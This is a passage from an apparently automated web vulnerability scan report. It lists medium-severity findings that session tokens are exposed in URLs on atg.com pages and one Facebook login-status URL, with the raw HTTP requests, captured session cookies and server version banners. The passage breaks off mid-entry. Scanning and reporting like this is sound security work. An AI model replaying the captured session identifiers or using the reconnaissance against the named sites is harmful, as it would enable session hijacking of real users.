href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200199"> Applications</a>...[SNIP]... <dd> <a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200200"> Commerce and Merchandising Products</a>, <a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200216"> Active Primus</a>...[SNIP]... <dt> <a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200200"> Commerce and Merchandising Products</a>...[SNIP]... <dd> <a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200202"> Merchandising</a>...[SNIP]... <dt> <a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200228"> Information Type</a>...[SNIP]... <dd> <a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200239"> Knowledge Base Solutions</a>, <a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=300004"> Sample Code</a>, <a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200230"> Technical References</a>, <a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200232"> Customer Case Studies</a>, <a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200238"> Problem Reports</a>, <a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200229"> Product Documentation</a>, <a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200236"> Release Notes</a>, <a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200231"> Solution Sheets</a>, <a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=400004"> White Papers</a>...[SNIP]... <dt> <a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=3"> Other</a></dt> <dt> <a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200216"> Active Primus</a>...[SNIP]... <dd> <a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200219"> Primus Enterprise Search</a>...[SNIP]... <span> <a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&focusTopic=&topicName=&useFocusTopic=true&sfield=&dosearch=true&pn=1" onclick="atgss_preserveUrlHash(this)"> Next</a>...[SNIP]... <span> <a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&focusTopic=&topicName=&useFocusTopic=true&sfield=&dosearch=true&pn=19.0" onclick="atgss_preserveUrlHash(this)"> Last</a>...[SNIP]...
8.32. http://www.atg.com/service/main.jsp
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://www.atg.com
Path:
/service/main.jsp
Issue detail
The URL in the request appears to contain a session token within the query string:http://www.atg.com/service/main.jsp?_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&focusTopic=&topicName=&useFocusTopic=true
Request
GET /service/main.jsp?_dyncharset=UTF-8&_dynSessConf=6188254392000198924 &t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&focusTopic=&topicName=&useFocusTopic=true HTTP/1.1 Host: www.atg.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0 X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ== Content-Language: 7cd9f92e1f6617753dfce39 Vary: Accept-Encoding Content-Type: text/html;charset=UTF-8 Expires: Tue, 06 Sep 2011 15:53:06 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 06 Sep 2011 15:53:06 GMT Content-Length: 116200 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- $Id: //application/service/version/9.1/SelfService/src/web-apps/SelfSe...[SNIP]...
8.33. https://www.atg.com/en/customers/listing/
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://www.atg.com
Path:
/en/customers/listing/
Issue detail
The response contains the following links that appear to contain session tokens:https://www.atg.com/en/products-services/education/schedule/?_DARGS=/en/includes/common/main-navigation.jsp_AF&_dynSessConf=6188254392000198924&/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=true&/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=month&/atg/extrasite/training/TrainingScheduleFormHandler.months=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.submit=+&/atg/extrasite/training/TrainingScheduleFormHandler.title=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.title=+&/atg/extrasite/training/TrainingScheduleFormHandler.location=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.location=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=+&/atg/extrasite/training/TrainingScheduleFormHandler.submit=true&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.months=+
Request
GET /en/customers/listing/ HTTP/1.1 Host: www.atg.com Connection: keep-alive Referer: https://www.atg.com/en/password/request/?successURL=/en/password/request/success/&_requestid=161697 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0 X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ== Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1 Expires: Tue, 06 Sep 2011 15:56:47 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 06 Sep 2011 15:56:47 GMT Content-Length: 49691 Connection: keep-alive <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <title>ATG Customers</...[SNIP]... <li class="bulleted"><a href="/en/products-services/education/schedule/?_DARGS=/en/includes/common/main-navigation.jsp_AF&_dynSessConf=6188254392000198924&/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=true&/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=month&/atg/extrasite/training/TrainingScheduleFormHandler.months=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.submit=+&/atg/extrasite/training/TrainingScheduleFormHandler.title=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.title=+&/atg/extrasite/training/TrainingScheduleFormHandler.location=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.location=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=+&/atg/extrasite/training/TrainingScheduleFormHandler.submit=true&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.months=+"> Course Schedule</a>...[SNIP]...
8.34. https://www.atg.com/en/password/request/
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://www.atg.com
Path:
/en/password/request/
Issue detail
The response contains the following links that appear to contain session tokens:https://www.atg.com/en/products-services/education/schedule/?_DARGS=/includes/templates/content-one-column.jsp_AF&_dynSessConf=6188254392000198924&/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=true&/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=month&/atg/extrasite/training/TrainingScheduleFormHandler.months=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.submit=+&/atg/extrasite/training/TrainingScheduleFormHandler.title=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.title=+&/atg/extrasite/training/TrainingScheduleFormHandler.location=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.location=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=+&/atg/extrasite/training/TrainingScheduleFormHandler.submit=true&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.months=+
Request
GET /en/password/request/ HTTP/1.1 Host: www.atg.com Connection: keep-alive Referer: https://www.atg.com/service/main.jsp?t=homeTab&locale=&_dyncharset=UTF-8 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0 X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ== Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1 Expires: Tue, 06 Sep 2011 15:53:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 06 Sep 2011 15:53:54 GMT Content-Length: 27516 Connection: keep-alive <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <title>Request Passwor...[SNIP]... <li class="bulleted"><a href="/en/products-services/education/schedule/?_DARGS=/includes/templates/content-one-column.jsp_AF&_dynSessConf=6188254392000198924&/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=true&/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=month&/atg/extrasite/training/TrainingScheduleFormHandler.months=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.submit=+&/atg/extrasite/training/TrainingScheduleFormHandler.title=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.title=+&/atg/extrasite/training/TrainingScheduleFormHandler.location=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.location=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=+&/atg/extrasite/training/TrainingScheduleFormHandler.submit=true&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.months=+"> Course Schedule</a>...[SNIP]...
8.35. https://www.atg.com/en/register/
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://www.atg.com
Path:
/en/register/
Issue detail
The response contains the following links that appear to contain session tokens:https://www.atg.com/en/products-services/education/schedule/?_DARGS=/includes/templates/content-one-column.jsp_AF&_dynSessConf=6188254392000198924&/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=true&/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=month&/atg/extrasite/training/TrainingScheduleFormHandler.months=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.submit=+&/atg/extrasite/training/TrainingScheduleFormHandler.title=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.title=+&/atg/extrasite/training/TrainingScheduleFormHandler.location=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.location=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=+&/atg/extrasite/training/TrainingScheduleFormHandler.submit=true&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.months=+
Request
GET /en/register/ HTTP/1.1 Host: www.atg.com Connection: keep-alive Referer: https://www.atg.com/service/main.jsp?t=homeTab&locale=&_dyncharset=UTF-8 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0 X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ== Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1 Expires: Tue, 06 Sep 2011 15:53:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 06 Sep 2011 15:53:51 GMT Content-Length: 43457 Connection: keep-alive <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <title>Register - ATG<...[SNIP]... <li class="bulleted"><a href="/en/products-services/education/schedule/?_DARGS=/includes/templates/content-one-column.jsp_AF&_dynSessConf=6188254392000198924&/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=true&/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=month&/atg/extrasite/training/TrainingScheduleFormHandler.months=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.submit=+&/atg/extrasite/training/TrainingScheduleFormHandler.title=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.title=+&/atg/extrasite/training/TrainingScheduleFormHandler.location=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.location=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=+&/atg/extrasite/training/TrainingScheduleFormHandler.submit=true&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.months=+"> Course Schedule</a>...[SNIP]...
8.36. https://www.atg.com/service/main.jsp
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://www.atg.com
Path:
/service/main.jsp
Issue detail
The URL in the request appears to contain a session token within the query string:https://www.atg.com/service/main.jsp?_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&focusTopic=&topicName=&useFocusTopic=true
Request
GET /service/main.jsp?_dyncharset=UTF-8&_dynSessConf=6188254392000198924 &t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&focusTopic=&topicName=&useFocusTopic=true HTTP/1.1 Host: www.atg.com Connection: keep-alive Referer: https://www.atg.com/service/main.jsp?t=homeTab&locale=&_dyncharset=UTF-8 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22
Response
HTTP/1.1 302 Moved Temporarily Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0 X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ== Location: http://www.atg.com/service/main.jsp?_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&focusTopic=&topicName=&useFocusTopic=true Content-Language: 7cd9f92e1f6617753dfce39 Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html;charset=UTF-8 Expires: Tue, 06 Sep 2011 15:53:05 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 06 Sep 2011 15:53:05 GMT Connection: keep-alive
8.37. http://www.facebook.com/extern/login_status.php
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://www.facebook.com
Path:
/extern/login_status.php
Issue detail
The URL in the request appears to contain a session token within the query string:http://www.facebook.com/extern/login_status.php?api_key=57345927025&app_id=57345927025&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc60f4ba8%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3cb50af8%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fd77541%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31d2c4284%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fd77541&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd66cbd98%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fd77541&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df273fd1124%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fd77541&sdk=joey&session_origin=1&session_version=3
Request
GET /extern/login_status.php?api_key=57345927025&app_id=57345927025&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc60f4ba8%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3cb50af8%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fd77541%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31d2c4284%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fd77541 &no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd66cbd98%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fd77541&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df273fd1124%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fd77541 &sdk=joey&session_origin=1&session_version=3 HTTP/1.1 Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-FB-Server: 10.62.255.53 X-Cnection: close Date: Tue, 06 Sep 2011 15:32:51 GMT Content-Length: 249 <script type="text/javascript"> parent.postMessage("cb=fd66cbd98&origin=http\u00253A\u00252F\u00252Fwww.readwriteweb.com\u00252Ff27c152a9&relation=parent&transport=postmessage&frame=f1fd77541", "http:...[SNIP]...
8.38. http://www.google.com/search
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://www.google.com
Path:
/search
Issue detail
